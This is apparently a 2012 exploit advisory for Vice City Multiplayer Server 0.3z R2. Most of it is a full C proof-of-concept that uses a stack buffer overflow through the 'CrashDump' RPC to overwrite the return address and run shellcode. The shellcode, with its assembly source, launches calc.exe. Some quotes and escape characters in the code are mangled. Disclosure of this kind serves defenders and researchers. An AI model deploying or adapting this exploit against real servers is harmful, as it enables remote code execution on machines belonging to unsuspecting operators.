Vice City Multiplayer Server Remote Code Execution Exploit

Summary

Vice City Multiplayer Server 0.3z R2 prone to remote code execution vulnerability.

Credit:

The information has been provided by Sasuke78200.


Details

Vulnerable Systems:
 * Vice City Multiplayer Server 0.3z R2

#include ‘main.h’
RakClientInterface* pClientInterface;

void Exploit()
{
unsigned long iLen;
unsigned char aBuffer[4096];
RakNet::BitStream* pBitStream;

unsigned char aShellCode[] =
{
0xE8, 0x25, 0x00, 0x00, 0x00, 0x5B, 0x81, 0xEC,
0x80, 0x00, 0x00, 0x00, 0x6A, 0x01, 0x6A, 0x00,
0x6A, 0x00, 0x53, 0x68, 0x78, 0x82, 0x44, 0x00,
0x6A, 0x00, 0xB8, 0x94, 0x61, 0x44, 0x00, 0xFF,
0x10, 0x6A, 0x00, 0xB8, 0x00, 0x61, 0x44, 0x00,
0xFF, 0x10, 0xE8, 0xD6, 0xFF, 0xFF, 0xFF, 0x63,
0x61, 0x6C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00
/* Compiled version of */
//USE32

//_start:
// call _string

//_begin:
// pop ebx
// sub esp, 0x80

// ; ShellExecuteA(0, ‘open’, ‘calc.exe’, 0, 0, SW_SHOWNORMAL);
// push 1
// push 0
// push 0
// push ebx
// push 0x448278 ; offset of ‘open’ on the server
// push 0x00
// mov eax, 0x446194
// call [eax]

// ; ExitProcess(0); To avoid a crash
// push 0
// mov eax, 0x446100
// call [eax]

//_string:
// call _begin
// db ‘calc.exe’
// db 0
};

pBitStream = new RakNet::BitStream();

memset(aBuffer, 0x49, sizeof(aBuffer));

iLen = 588; // limit of the stack on Windows

// New EIP (stack pointer)

*(unsigned long*)&aBuffer[iLen] = 0x4165E6; // Windows
iLen += 4; // EIP
*(unsigned long*)&aBuffer[iLen] = 0x90909090;
iLen += 4;
memcpy(&aBuffer[iLen], aShellCode, sizeof(aShellCode));
iLen += sizeof(aShellCode);

pBitStream->Write((unsigned int)iLen);
pBitStream->Write((char*)aBuffer, iLen);

pClientInterface->RPC(‘CrashDump’, pBitStream, HIGH_PRIORITY, RELIABLE, 0, false, UNASSIGNED_NETWORK_ID, 0);
delete pBitStream;
}

int main()
{

Packet* pPacket;

pClientInterface = RakNetworkFactory::GetRakClientInterface();
pClientInterface->Connect(‘127.0.0.1’, 5192, 0, 0, 20);

for(;;)
{
while((pPacket = pClientInterface->Receive()) != 0)
{
switch(pPacket->data[0])
{
case ID_CONNECTION_REQUEST_ACCEPTED:
{
puts(‘Connected …’);
Exploit();
break;
}
case ID_CONNECTION_LOST:
{
puts(‘Connection time outnCode executed ? :)’);
break;
}
case ID_RECEIVED_STATIC_DATA:
{
break;
}
default:
{
printf(‘packet id %d received lenght %d bytesn’, pPacket->data[0], pPacket->length);
}
}

pClientInterface->DeallocatePacket(pPacket);
}

}

return 0;
}

Disclosure Timeline:
Published: 2012-08-23

Categories: Exploits